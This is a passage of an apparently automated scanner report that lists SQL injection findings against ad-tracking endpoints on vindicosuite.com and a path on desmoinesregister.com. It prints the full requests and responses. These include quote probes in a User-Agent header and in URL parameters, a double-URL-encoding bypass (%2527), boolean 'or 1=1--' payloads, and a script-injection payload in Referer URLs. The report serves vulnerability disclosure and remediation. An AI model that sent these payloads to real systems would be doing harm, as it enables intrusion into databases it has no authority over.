Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; __qca=P0-1000809586-1297647560942; ASPSESSIONIDQCDARSQC=GEEIPCKDKELIPBPFGCNCHLPP; ASPSESSIONIDQQQBQRQB=LGNJFCKDCOEOIDPLMBHLJKED; ASPSESSIONIDCSRCARRC=HJMBHMGANPCOKHHIKGIJKLNJ

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 15:10:02 GMT
Expires: Mon, 14 Feb 2011 15:10:02 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQQCDTBB=FEFHHLGAEMEGMJHHKFBIAOEF; path=/
X-Powered-By: ASP.NET
Content-Length: 790
Connection: keep-alive

<br>Error Description:Error converting data type nvarchar to int.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = c0260, @campaignId = 6468, @syndicationOutletId
...[SNIP]...

1.17. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=c0260 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=c0260%22%3E%3Cscript%3Ealert(1)%3C/script%3E92954893223&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; __qca=P0-1000809586-1297647560942; ASPSESSIONIDQCDARSQC=GEEIPCKDKELIPBPFGCNCHLPP; ASPSESSIONIDQQQBQRQB=LGNJFCKDCOEOIDPLMBHLJKED; ASPSESSIONIDCSRCARRC=HJMBHMGANPCOKHHIKGIJKLNJ

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 15:09:57 GMT
Expires: Mon, 14 Feb 2011 15:09:57 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQCDCTAB=EIFDJOGAPINJDCCOICHBBKIJ; path=/
X-Powered-By: ASP.NET
Content-Length: 1558
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'undefined'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = c0260, @campaignId = 6468, @syndicationOutletId = 49160,
...[SNIP]...

Request 2

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=c0260 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=c0260%22%3E%3Cscript%3Ealert(1)%3C/script%3E92954893223&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13''
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; __qca=P0-1000809586-1297647560942; ASPSESSIONIDQCDARSQC=GEEIPCKDKELIPBPFGCNCHLPP; ASPSESSIONIDQQQBQRQB=LGNJFCKDCOEOIDPLMBHLJKED; ASPSESSIONIDCSRCARRC=HJMBHMGANPCOKHHIKGIJKLNJ

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 15:09:58 GMT
Expires: Mon, 14 Feb 2011 15:09:58 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQCDCTAB=GJFDJOGAJBJJJBNJLNDOEJKN; path=/
X-Powered-By: ASP.NET
Content-Length: 1568
Connection: keep-alive

<br>Error Description:Error converting data type nvarchar to int.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = c0260, @campaignId = 6468, @syndicationOutletId
...[SNIP]...

1.18. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The adRotationId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the adRotationId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the adRotationId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047%2527&bannerCreativeAdModuleId=21772 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:41:56 GMT
Expires: Mon, 14 Feb 2011 01:41:57 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCRTSCDC=MDJLPDEAADPMDJOHFMBJCMJL; path=/
X-Powered-By: ASP.NET
Content-Length: 1401
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = 21772, @campaignId = 6468, @syndicationOutletId = 49160, @adrotat
...[SNIP]...

1.19. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The bannerCreativeAdModuleId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the bannerCreativeAdModuleId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the bannerCreativeAdModuleId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=21772%2527 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:42:14 GMT
Expires: Mon, 14 Feb 2011 01:42:15 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDASTCAQQC=LDMLGBKDPDJFNIBBNADNPNMD; path=/
X-Powered-By: ASP.NET
Content-Length: 1402
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = 21772%27, @campaignId = 6468, @syndicationOutletId = 49160, @adro
...[SNIP]...

1.20. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The campaignId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the campaignId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the campaignId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468%2527&adRotationId=13047&bannerCreativeAdModuleId=21772 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:41:42 GMT
Expires: Mon, 14 Feb 2011 01:41:42 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQQTQBCC=DLBNDMJDNKIDNMDKPADJABFN; path=/
X-Powered-By: ASP.NET
Content-Length: 1402
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = 21772, @campaignId = 6468%27, @syndicationOutletId = 49160, @adro
...[SNIP]...

1.21. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The siteId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the siteId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the siteId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55%2527&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=21772 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:41:06 GMT
Expires: Mon, 14 Feb 2011 01:41:06 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSACDSAD=PMPJANJDAHGLDPAGNOMFKNLG; path=/
X-Powered-By: ASP.NET
Content-Length: 1402
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55%27, @bannerCreativeAdModuleId = 21772, @campaignId = 6468, @syndicationOutletId = 49160, @adro
...[SNIP]...

1.22. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The syndicationOutletId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the syndicationOutletId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the syndicationOutletId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160%2527&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=21772 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:41:27 GMT
Expires: Mon, 14 Feb 2011 01:41:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSACDSSTA=AHLNOCKDFBNKACKODKPLOBNG; path=/
X-Powered-By: ASP.NET
Content-Length: 1402
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = 21772, @campaignId = 6468, @syndicationOutletId = 49160%27, @adro
...[SNIP]...

1.23. http://www.desmoinesregister.com/odygel/lib/core/core.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.desmoinesregister.com
Path:   /odygel/lib/core/core.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 22520002'%20or%201%3d1--%20 and 22520002'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /odygel/lib/core22520002'%20or%201%3d1--%20/core.js HTTP/1.1
Host: www.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://www.desmoinesregister.com/scripts/app'%20and%201%3d1--%20/js/jquery-1.3.1.min.js?ver=3.0.4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; s_cc=true; s_sq=%5B%5BB%5D%5D; SiteLifeHost=gnvm25l3pluckcom; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A5H%2Cplacementid%3A1272947%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1272948/0/0/ADTECH%253Balias%253Dia-desmoines.desmoinesregister.com/news/opinion/blog/front.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D15892%253Bmisc%253D1297647421991%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1297665422

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Last-Modified: Mon, 14 Feb 2011 15:10:46 GMT
X-Processing-begin: MOC-WN0516, on site D2 (2011-02-14 10:10:46:597)
Content-Type: text/html
X-Processing-finished: MOC-WN0516, on site D2 (2011-02-14 10:10:46:644)
Content-Type: text/html; charset=iso-8859-1
Content-Length: 27910
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 15:10:46 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
                               <title> | The Des Moines Register | DesMoinesRegister.com
...[SNIP]...
<br>
Scripts: 32ms<br>

-->

Request 2

GET /odygel/lib/core22520002'%20or%201%3d2--%20/core.js HTTP/1.1
Host: www.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://www.desmoinesregister.com/scripts/app'%20and%201%3d1--%20/js/jquery-1.3.1.min.js?ver=3.0.4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; s_cc=true; s_sq=%5B%5BB%5D%5D; SiteLifeHost=gnvm25l3pluckcom; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A5H%2Cplacementid%3A1272947%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1272948/0/0/ADTECH%253Balias%253Dia-desmoines.desmoinesregister.com/news/opinion/blog/front.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D15892%253Bmisc%253D1297647421991%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1297665422

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Last-Modified: Mon, 14 Feb 2011 15:10:46 GMT
X-Processing-begin: MOC-WN0516, on site D2 (2011-02-14 10:10:46:737)
Content-Type: text/html
X-Processing-finished: MOC-WN0516, on site D2 (2011-02-14 10:10:46:784)
Content-Type: text/html; charset=iso-8859-1
Content-Length: 27932
Vary: Accept-Encoding
